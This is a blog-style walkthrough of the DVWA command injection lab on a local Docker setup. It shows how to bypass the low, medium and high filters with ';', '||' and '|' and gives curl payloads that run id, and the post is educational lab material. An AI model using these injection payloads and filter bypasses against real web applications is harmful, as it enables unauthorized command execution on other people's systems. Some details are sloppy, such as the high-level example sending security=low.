So you installed Dam Vulnerable Web Applications, now what to you do. Join me as I continue my series on Learning about Linux CTF Challenges with DVWA. DVWA (Dam Vulnerable Web Application) is a framework we can use to learn about Linux exploits that we can use in common CTF challenges. In this post I will go through Learning to beat DVWA Command Injection via the web GUI, Curl and even with Python.
What is Command Injection?
Command injection is an attack method that involves executing arbitrary commands on a host operating system, in the case of DVWA it will be a remote operating system. Typically, the threat injects the commands by exploiting an application vulnerability, such as insecure input validation.
What is command Injection good for?
If we can add our own commands onto the end of another valid command then we can work to exploit and access information we were not intended to have access to. In some cases such as like the low and medium security level, it would be not too difficult to get a reverse shell by just adding on the necessary with command injection. With the security level set to “high” it would be more difficult and require some “creative” thinking.
Set-up
System
In my previous post I discussed how to set up DVWA inside docker on my black arch system. You should have a running DVWA environment before attempting any of the below.
| 192.168.1.163 | Docker host running DVWA |
| 8082 | Port on which DVWA is running |
| 192.168.1.150 | Windows PC where I am running WSL and Firefox |
Authentication
Most of the commands we will use here will require authentication before you can attempt any commands. We can use a PHP Session ID to enable authentication.
Getting PHP Session ID
To get a session ID we will use Firefox but Chrome and Edge have the same features. First step is to open up the home page of DVWA and login in. The default login is user: admin and password: password
Once logged in you need to set the DVWA Security to low. This can be done after login by clicking on the DVWA Security tab, setting the Security Level to low and click “Submit”
Inside firefox lets open the inspect tool. You can do this by right clicking the page and select “Inspect” or use the keyboard short cut, in windows thats “ctrl + shift + c”. Once opened go to the storage tab and under “Cookies” Select the PHPSSID Cookie. The Cookie value will appear on the right side of the screen, right click and copy it.
In my case the value is “PHPSESSID:”hjqhvo1e4i14bo6hbh9ndqc7h2“. Whatever your value is keep it some where safe as you will need it in when doing some enumeration later on.
Also we can see another cookie here called “security” with the value of “low”. We need this for authentication and for setting the security level of the DVWA system.
Testing Authentication
Now you have the php session id its simple to check if it works.
First with out any authentication Cookies.
curl http://192.168.1.163:8082/vulnerabilities/brute/
No result and nothing returned. Lets now try it using our php session cookie and security level.
curl http://192.168.1.163:8082/vulnerabilities/brute/ \
-H "Cookie: security=low;PHPSESSID=hjqhvo1e4i14bo6hbh9ndqc7h2" \
-s | head
We pipe the command into head as there is a lot of code returned and we only want to see the top few lines.
We have now confirmed that our Authentication works and can proceed with testing the exploits.
DVWA Command Injection
Security Levels
Like the rest of the DVWA challenges, the LFI one comes with 4 security levels.
- Low, very straight forward Injection attack.
- Medium, very similar to the previous one slightly different approach.
- High, Similar to the preceding two, not too challenging.
- Impossible, what is says.
Beating DVWA Command Injection on Low Security
GUI
Browse to your deployment of DVWA and login with username and password. (Default username is “admin” and password is “password”
Go to the command injection page and in the box called “Enter an IP” put in 8.8.8.8 and click Submit.
It can be seen that the ping command is run and if you open up the “View Source” button at the bottom of the page it can be seen what code is actually run.
In this case the code is simple, there is no input validation and the command that is run is
ping -c 4 $target
As there is no input validation we can take advantage of a nice linux command line feature that allows us to chain commands together. This can be done by simply putting a “;” between each commands. For example.
whoami;id
This will run the “whoami” command and then run the “id” command.
There are a few other ways to do this.
- &&, this will allow sequential commands to only run if the previous command is successful. “id && whoami”
- ||, this will allow sequential commands to only run if the previous command is not successful. “madeupcommand || whoami”
- |, regardless of the output of the command before the pipe, whats after the pipe will try to run.
So for the easy option we can just add “;id” to the end of the command to beat it.
You can see in the below screenshot that the “id” command outputted below the ping command.
curl
To do this with a curl command we need to make a POST request and use the cookie session data from above. An explination of the options with curl can be found with the “man curl” command.
curl -X POST "http://192.168.1.163:8082/vulnerabilities/exec/" \
-d 'ip=1.1.1.1;id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" -s 
I used grep to limit the result to just the output of the id command i ran.
Beating DVWA Command Injection on Medium Security
GUI
If you take a look at the php code you can see there is some substitution going on,
But as only the “&&” and “;” are substituted its not too difficult to circumvent with using a logical OR “||”
A logicil OR only runs if the first command fails. As ping is the first command we need it to fail before the next command will run. So we exclude the ip address.
curl
Curl command is mostly the same as previous one.
curl -X POST "http://192.168.1.163:8082/vulnerabilities/exec/" \
-d 'ip=||id;id&Submit=Submit' \
-H "Cookie: security=medium;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s
Beating DVWA Command Injection on High Security
High security looks like a hard one to crack on first look as there is a php trim and a lot of substitutions, but instead of a security bug there seems to be a human error with the code.
If you look closely at the “|” substitution you can see there is a space after it. It means it will only substitute “| ” and not “|”. Once this is spotted it becomes easier to do break it.
We can just pipe into another command, with no space, to get what we need.
And we get a result.
curl
Very similar to the medium one.
curl -X POST "http://192.168.1.163:8082/vulnerabilities/exec/" \
-d 'ip=|id;id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s 
Doing it with Python
I have wrote a python script that can do all security levels. You can find it over at my github page.
Wrap-Up
Hope you learned something from this experience and I value any comments you have. Also check out my video on how to do this all in the web GUI.